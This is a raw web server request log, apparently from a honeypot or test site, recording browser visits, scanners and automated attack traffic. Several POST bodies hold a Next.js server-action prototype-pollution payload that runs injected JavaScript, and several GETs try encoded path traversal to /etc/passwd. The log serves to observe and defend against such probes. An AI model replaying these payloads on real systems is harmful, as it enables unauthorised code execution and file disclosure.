X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:39] === HTTP Request ===
[2026-03-10 07:08:39] Main page accessed - IP: 172.30.0.12:39434
===================
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.58.120
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /
URL: /
Method: GET
[2026-03-10 07:08:39] === HTTP Request ===
[2026-03-10 07:08:31] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Fetch-User: ?1
Priority: u=0, i
X-Forwarded-Proto: https
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
Sec-Fetch-Site: same-origin
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.58.120
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:31] === HTTP Request ===
[2026-03-10 07:08:30] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
Priority: u=0, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.58.120
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:30] === HTTP Request ===
[2026-03-10 07:08:29] Login page accessed - IP: 172.30.0.12:39434
===================
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.58.120
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:29] === HTTP Request ===
[2026-03-10 07:08:27] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
X-Forwarded-For: 178.120.58.120
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Referer: https://admin.vulnberries.ru/login
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Via: 2.0 Caddy
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:27] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.58.120
Sec-Fetch-Dest: image
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 07:08:19] === HTTP Request ===
===================
X-Forwarded-For: 178.120.58.120
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-10 07:08:19] === HTTP Request ===
===================
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/login
X-Forwarded-For: 178.120.58.120
Via: 2.0 Caddy
Priority: u=1
Accept: */*
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-10 07:08:19] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.58.120
Sec-Fetch-Dest: style
Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Mobile: ?0
Priority: u=0
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-10 07:08:19] === HTTP Request ===
[2026-03-10 07:08:19] Login page accessed - IP: 172.30.0.12:39434
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-For: 178.120.58.120
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Priority: u=0, i
Cache-Control: max-age=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:19] === HTTP Request ===
===================
------WebKitFormBoundaryx1636652644353--
------WebKitFormBoundaryx1636652644353
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1636652644353
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 321904+true+5084288;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1636652644353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1636652644353
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 522
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1636652644353
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51956
Path: /api/route
URL: /api/route
Method: POST
[2026-03-10 06:56:56] === HTTP Request ===
===================
------WebKitFormBoundaryx85889750626--
------WebKitFormBoundaryx85889750626
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx85889750626
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 26155+true+3283875;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx85889750626
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_85889750626
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx85889750626
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51946
Path: /app
URL: /app
Method: POST
[2026-03-10 06:56:55] === HTTP Request ===
===================
------WebKitFormBoundaryx585941856046--
------WebKitFormBoundaryx585941856046
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx585941856046
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 116755+true+5018559;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx585941856046
Content-Length: 518
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_585941856046
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx585941856046
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51934
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-10 06:56:55] === HTTP Request ===
===================
------WebKitFormBoundaryx560540652337--
------WebKitFormBoundaryx560540652337
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx560540652337
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 318921+true+1757616;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx560540652337
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_560540652337
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx560540652337
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51932
Path: /api
URL: /api
Method: POST
[2026-03-10 06:56:55] === HTTP Request ===
===================
------WebKitFormBoundaryx584521377969--
------WebKitFormBoundaryx584521377969
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx584521377969
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 243566+true+2399848;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx584521377969
X-Nextjs-Html-Request-Id: ilovepoop_584521377969
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx584521377969
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51918
Path: /_next
URL: /_next
Method: POST
[2026-03-10 06:56:55] === HTTP Request ===
[2026-03-10 06:56:54] Main page accessed - IP: 195.3.221.86:51902
===================
------WebKitFormBoundaryx774910288309--
------WebKitFormBoundaryx774910288309
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx774910288309
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 245284+true+3159237;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx774910288309
Accept-Encoding: gzip, deflate
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_774910288309
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx774910288309
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51902
Path: /
URL: /
Method: POST
[2026-03-10 06:56:54] === HTTP Request ===
[2026-03-10 06:56:54] Main page accessed - IP: 195.3.221.86:51892
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51892
Path: /
URL: /
Method: GET
[2026-03-10 06:56:54] === HTTP Request ===
[2026-03-10 06:55:36] Main page accessed - IP: 152.42.218.175:46364
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.218.175:46364
Path: /
URL: /
Method: GET
[2026-03-10 06:55:36] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.120.58.120
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://admin.vulnberries.ru/login
Priority: u=1, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43332
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 06:27:13] === HTTP Request ===
[2026-03-10 06:20:15] Main page accessed - IP: 178.128.30.185:43602
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:43602
Path: /
URL: /
Method: GET
[2026-03-10 06:20:15] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:64958
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-10 06:00:03] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:64948
Path: /static/link/../../etc/passwd
URL: /static/link/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-10 06:00:03] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:64936
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-10 06:00:03] === HTTP Request ===
[2026-03-10 05:51:38] Main page accessed - IP: 152.42.204.253:46766
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:46766
Path: /
URL: /
Method: GET
[2026-03-10 05:51:38] === HTTP Request ===
[2026-03-10 05:33:19] Main page accessed - IP: 139.59.170.85:51976
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:51976
Path: /
URL: /
Method: GET
[2026-03-10 05:33:19] === HTTP Request ===
[2026-03-10 05:21:12] Main page accessed - IP: 167.71.223.42:48658
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.223.42:48658
Path: /
URL: /
Method: GET
[2026-03-10 05:21:12] === HTTP Request ===
[2026-03-10 05:04:33] Main page accessed - IP: 172.105.128.13:12192
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.105.128.13:12192
Path: /
URL: /
Method: GET
[2026-03-10 05:04:33] === HTTP Request ===
[2026-03-10 04:32:17] Main page accessed - IP: 66.228.62.150:57724
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 66.228.62.150:57724
Path: /
URL: /
Method: GET
[2026-03-10 04:32:17] === HTTP Request ===
[2026-03-10 03:34:21] Main page accessed - IP: 205.210.31.65:58236
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 205.210.31.65:58236
Path: /
URL: /
Method: GET
[2026-03-10 03:34:21] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.121:36583
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 03:13:13] === HTTP Request ===
[2026-03-10 03:11:00] Main page accessed - IP: 91.231.89.66:60319
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.66:60319
Path: /
URL: /
Method: GET
[2026-03-10 03:11:00] === HTTP Request ===
===================
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Referer: http://95.143.191.38:8081/
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 178.128.172.120:36164
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 02:47:12] === HTTP Request ===
[2026-03-10 02:47:12] Main page accessed - IP: 178.128.172.120:36160
===================
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Linux"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 178.128.172.120:36160
Path: /
URL: /
Method: GET
[2026-03-10 02:47:12] === HTTP Request ===
[2026-03-10 01:06:37] Main page accessed - IP: 165.232.40.42:54642
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.232.40.42:54642
Path: /
URL: /
Method: GET
[2026-03-10 01:06:37] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:3028
Path: /static/link/../../etc/passwd
URL: /static/link/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-09 23:36:07] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:3006
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-09 23:36:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:3022
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-09 23:36:07] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:48300
Path: /static/link/../../etc/passwd
URL: /static/link/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-09 23:27:40] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:48284
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-09 23:27:40] === HTTP Request ===
===================
Accept-Encoding: gzip
